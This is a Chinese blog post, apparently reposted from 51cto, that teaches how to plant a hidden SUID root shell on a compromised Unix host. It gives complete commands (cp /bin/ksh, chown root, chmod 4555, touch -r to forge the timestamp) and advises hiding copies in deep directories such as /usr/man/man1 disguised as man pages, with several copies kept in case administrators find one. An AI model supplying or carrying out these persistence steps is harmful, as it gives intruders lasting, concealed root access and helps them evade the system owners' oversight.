在 /tmp 或者其他的目录下放置 suid shell。以后只要你运行这个,就会轻易得到根用户权限。
  
  #cp /bin/ksh /tmp/.sh
  
  #chown root:root /tmp/.sh
  
  #chmod +s /tmp/.sh
  
  当你运行/tmp/.sh时,
  
  这里我们用ksh shell是因为ksh 可以suid.换成其他的shell也许可能不行,具体看各个主机的情况而定.一般我们使用ksh.我们使用的溢出用来获得root权限的,也一般是溢出后执行/bin/ksh.
  
  $id
  
  uid=1002(oracle) gid=1(other)
  
  $/tmp/.sh
  
  #
  
  #id
  
  uid=1002(oracle) gid=1(other) euid=0(root) egid=0(root)
  
  我们又是root了.
  
  当然,为了更加隐蔽,我们不能把suid shell 放在/tmp
  
  因为它是很容易被发现的.
  
  我们应该放在深层的目录里面.
  
  比如:
  
  /usr/X11/include/X11/
  
  或者
  
  /usr/lib/
  
  等等
  
  通常我做的是:
  
  # mkdir /usr/lib/lib/ mkdir /usr/lib/lib/...
  
  # cp /bin/ksh /usr/lib/lib/.../lib
  
  # chown root:sys /usr/lib/lib/.../lib
  
  # chmod 4555 /usr/lib/lib/.../lib
  
  # touch -r /bin/ksh /usr/lib/lib/.../lib
  
  一个简单的suid shell安放好了.
  
  不过,大家不要学我,我们要放在最隐蔽的地方.我新建目录的隐藏效果不是最好的.
  
  我们必须利用现有的目录来安放,并且这个目录要有很多其它的文件做掩护.
  
  大家不防试试/usr/man/下的目录.
  
  很少管理员会检查这里的.
  
  比如:
  
  /usr/man/man1/
  
  /usr/man/manl/
  
  等.
  
  比如:
  
  # cp /bin/ksh /usr/man/man1/ja.1
  
  :)当然具体要看你自己琢磨一下了.我敢说不难,最好多放置几个suid shell 在不同的目录.这样即使管理员发现了一个,也还有另外一个.:)

转载于:https://blog.51cto.com/linkboy/300416

suid shell相关推荐

  1. ATTCK矩阵 linux系统安全实践

    0×01 前言 MITRE在2013年推出了ATT&CK模型,根据真实的观察数据来描述和分类对抗行为.ATT&CK将已知攻击者行为转换为结构化列表,近两年来,也在安全行业中广受欢迎,涌 ...

  2. cve -2016-6663 mysql 本地提权

    0x01 漏洞原文 翻译水平不高求轻喷 感觉作者在写文章的时候有些地方描述的也不是特别清楚,不过结合poc可以清晰理解漏洞利用过程 0x04漏洞利用过程总结给出了清晰的漏洞利用过程,结合poc食用效果 ...

  3. mysql cve 2016 3521_MySQL-based databases CVE -2016-6663 本地提权

    @date: 2016/11/3 @author: dlive 0x01 漏洞原文 翻译水平不高求轻喷 感觉作者在写文章的时候有些地方描述的也不是特别清楚,不过结合poc可以清晰理解漏洞利用过程 0x ...

  4. mysql提权方式linux_Linux提权的几种常用方式

    本文转载自微信公众号「Bypass」,作者Bypass .转载本文请联系Bypass公众号. 在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行 ...

  5. linux 系统命令被后门修改_Linux、Windows权限维持常用后门学习总结

    前言 在上周做的变种DDG挖矿木马-watchdogs应急响应中,攻击者使用了预加载来劫持ps.top等系统命令,没有提及具体的排查手段,借着这篇文章来详细解释下,并总结下Linux.Windows下 ...

  6. Linux 多个留后门姿势

    https://www.anquanke.com/post/id/155943 在一次渗透中,成功获取某目标几台比较重要的机器,当时只想着获取脱库,结果动静太大被发现了,之前渗透并没太在意Linux维 ...

  7. 20194311姜晨昊Exp2-后门原理与实践

    文章目录 20194311姜晨昊Exp2-后门原理与实践 一.实验基础 基础知识 后门的概念 常用后门工具 1.NC和Netcat 2.SoCat 3.Meterpreter 二.实验目标 三. 实验 ...

  8. Unix编程/应用问答中文版(转)

    Unix编程/应用问答中文版 名称 -- Unix编程/应用问答中文版 版本 -- 0.04 ( 2003-10-09 外发版 ) 维护 -- 小四 <scz@nsfocus.com> 主 ...

  9. 各类后门整理!【白帽黑客必备生存技能】

    Unix Bash 远控后门 简介 利用 Unix/Linux 自带的 Bash 和 Crond 实现远控功能,保持反弹上线到公网机器. 利用方法 先创建 /etc/xxxx 脚本文件(名字自己改), ...

最新文章

  1. 谁能搞定中国的文艺复兴,我就能搞定中国的政治改革
  2. 业务直通式管理,你真的了解吗?
  3. 通话录音_iOS14,通话录音终于来了!
  4. oracle product文件,快速修复Oracle参数文件的另类方法
  5. Eclipse上安装springsource-tool-suite
  6. 详解自动驾驶仿真框架OpenCDA: An Open Cooperative Driving Automation Framework Integrated with Co-Simulation
  7. 瞧!公务员的工作还可以这样干
  8. 最大子序和(Leetcode第53题)
  9. Linux产生僵尸进程和孤儿进程及区别
  10. OpenStack回顾和展望-2018
  11. 电脑qq浏览器怎么滚动截长图_电脑怎么快速截图?
  12. Android上使用OkHttp来实现断点下载(续传)
  13. Java基础系列1-Java语言概述
  14. 关于哔哩哔哩视频,音频合并(使用ffmpeg批量处理)
  15. 误删了计算机桌面回收站,不小心误删电脑回收站怎么恢复?
  16. php手机地图导航,PHP引用百度地图API制作一个地图导航
  17. 流利阅读 2019.1.23 Tech industry expo opens portal to tomorrow
  18. 关于UEFI引导的理解
  19. 女人四十学计算机有用吗,四十岁的女人,开始学做美容工作,有前途吗
  20. Excel应用技巧:合并单元格的排序

热门文章

  1. java线程泄露_面试官:小伙子先来说一下可能引起Java内存泄露的场景吧
  2. snippets vscode 配置_VSCode 利用 Snippets 设置超实用的代码块
  3. 2020年快手校招JAVA岗笔试第二题
  4. 第12章:项目采购管理-章节真题
  5. 页面缓存 ehcache(简单的)
  6. 笔记-高项案例题-2017年上-质量管理
  7. 审计 Linux 系统的操作行为的 5 种方案对比
  8. Winform中实现连接Mysql并获取所有表名
  9. Linux上怎样停止服务(jar包)、查看进程路径、关闭指定端口
  10. 信息系统项目管理师-论文专题(三)范围管理论文写作